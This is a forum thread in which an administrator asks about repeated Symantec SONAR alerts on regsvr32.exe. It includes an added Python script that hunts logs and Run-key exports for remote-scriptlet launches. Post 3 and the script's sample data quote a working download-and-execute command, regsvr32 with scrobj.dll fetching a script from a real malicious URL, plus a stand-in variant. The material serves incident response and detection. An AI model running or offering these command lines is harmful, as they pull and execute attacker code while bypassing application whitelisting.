Endpoint Protection

  • 1.  SONAR.SuspLaunch!g24 Virus

    Posted Aug 20, 2018 05:29 AM

    Hello Team,

    We are continuously seeing alerts about "Downloader Dromedan attack activity blocked", and the culprit service is regsvr32.exe, which falls under the category SONAR.SuspLaunch!g24 as reported by Symantec. Please assist as to what steps should be followed:

    Risk log entry:

      OS:       Windows 7 Professional Edition
      Risk:     SONAR.SuspLaunch!g24 (Security Risk)
      Count:    1
      Date:     08/20/2018 09:16:43
      Group:    Default
      File:     c:\windows\system32\regsvr32.exe
      SHA-256:  890c1734ed1ef6b2422a9b21d6205cf91e014add8a7f41aa5a294fcf60631a7b

    Related events (Windows 7 Enterprise Edition, group Default, count 1 each):

      Date/Time            Event                        Severity         Direction
      08/18/2018 09:04:40  Active Response disengaged   Info and above   Other
      08/18/2018 08:55:40  Intrusion Prevention         Critical         Inbound
      08/18/2018 08:54:45  Active Response              Major and above  Inbound


  • 2.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 20, 2018 11:41 AM

    Are you under the impression this is a false positive? I would submit to Symantec so they can review this.



  • 3.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 20, 2018 10:34 PM

    Hello Brian,

    Thanks for the response. I submitted the sample and, as per Symantec, the file regsvr32.exe is clean. I went through many articles online (https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/, https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/) and found that there is some registry entry created in the system by which regsvr32 tries to register a DLL and then attempts to connect to a malicious URL, which is blocked by SEP.

    The registry entry created is regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll.

    I would like an analysis and a clue as to where this registry entry came from, and why only scrobj.dll was selected by regsvr32.exe to connect to the malicious domain.

    Can you help please.

    Thanks,


  • 4.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 21, 2018 03:20 AM

    You'd need the initial dropper or malicious file that created it to analyze.



  • 5.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 21, 2018 06:45 AM

    Can we somehow check which file was the dropper, and whether that file is still present on the system?



  • 6.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 21, 2018 06:51 AM

    Tough to say. You'll want to run a full forensic analysis on the system and try to correlate it with logs from your network devices, such as your firewall/IPS, to see how it got in. Ideally, if you had file integrity monitoring enabled for the system, it would make this easier.

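Added example, not from the thread and not Symantec tooling: the SONAR alert names only the launcher, regsvr32.exe, which is clean because it is the legitimate Windows binary. What leads back toward the dropper asked about in posts 3 to 6 is the parent process recorded at process creation, and the autorun value that relaunches the command. The Python below flags the pattern quoted in post 3 (regsvr32 loading scrobj.dll with an http(s) argument) in constructed Sysmon-style process-creation records and in a constructed "reg export" of the per-user Run keys. The record layout, the sample lines and the example.invalid URL are assumptions made for the example; the server2.aserdefa.ru URL is the one reported in the thread.

```python
"""Hunt for regsvr32 remote-scriptlet launches (regsvr32 ... scrobj.dll with an
http(s) argument, as quoted in post 3) in process-creation logs and in an
exported Run key. Added example; the log format, the .reg text and example.invalid
are constructed, the server2.aserdefa.ru URL is the one reported in the thread."""
import re

# Matches a regsvr32 image in a command line, with or without path, quotes or .exe
REGSVR32_RE = re.compile(r'(?:^|[\\\s"])regsvr32(?:\.exe)?(?=["\s]|$)', re.I)
SCROBJ_RE = re.compile(r'scrobj\.dll', re.I)
# The scriptlet URL, whether passed bare (as in the thread) or via /i:"..."
URL_RE = re.compile(r'https?://[^\s"]+', re.I)


def is_remote_scriptlet_launch(cmdline):
    """Return the scriptlet URL if cmdline is regsvr32 loading scrobj.dll with
    an http(s) argument; None for ordinary regsvr32 use or other programs."""
    if not REGSVR32_RE.search(cmdline) or not SCROBJ_RE.search(cmdline):
        return None
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


# Constructed process-creation records, Sysmon-style fields joined by '|':
# UtcTime|ParentImage|Image|CommandLine. The parent is the lead to the dropper.
SAMPLE_PROCESS_LOG = r'''
2018-08-20 09:16:40|C:\Windows\explorer.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"
2018-08-20 09:16:43|C:\Windows\System32\cmd.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll
2018-08-20 09:17:01|C:\Windows\System32\wscript.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /n /u /i:"https://example.invalid/payload.sct" scrobj.dll
2018-08-20 09:18:00|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\user\notes.txt
'''


def scan_process_log(text):
    """Return (time, parent_image, url) for each remote-scriptlet launch."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, parent, _image, cmdline = line.split('|', 3)
        url = is_remote_scriptlet_launch(cmdline)
        if url:
            hits.append((when, parent, url))
    return hits


# Constructed 'reg export' text of the per-user Run/RunOnce keys, a usual
# place for an entry like the one quoted in post 3 to be persisted.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"restore"="regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"cleanup"="cmd.exe /c del C:\\Users\\user\\AppData\\Local\\Temp\\setup.tmp"
'''

REG_KEY_RE = re.compile(r'^\[(.+)\]$')
# "name"="data" with .reg escaping (\\ for backslash, \" for quote) in both parts
REG_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def scan_reg_export(text):
    """Return (key, value_name, url) for autorun values launching a remote scriptlet."""
    hits, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        km = REG_KEY_RE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = REG_VALUE_RE.match(line)
        if vm and key:
            # Undo .reg escaping so the data is the command line as Windows runs it
            name, data = (re.sub(r'\\(.)', r'\1', vm.group(i)) for i in (1, 2))
            url = is_remote_scriptlet_launch(data)
            if url:
                hits.append((key, name, url))
    return hits


if __name__ == '__main__':
    for when, parent, url in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f'{when}  parent={parent}  scriptlet={url}')
    for key, name, url in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f'{key}\\{name} -> {url}')
```

Run against a real Sysmon Event ID 1 export (or Security 4688 with command-line auditing enabled) and a "reg export" of the Run, RunOnce and Winlogon keys of every profile: the parent image of the flagged launch and the writer of the flagged value are the first things to pull timelines for. The hash in the original alert is of regsvr32.exe itself and will always come back clean, so it is not an indicator worth submitting.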


  • 7.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Jan 17, 2019 03:40 PM

    The problem persists, and the Symantec team has not taken on the task of solving the problem.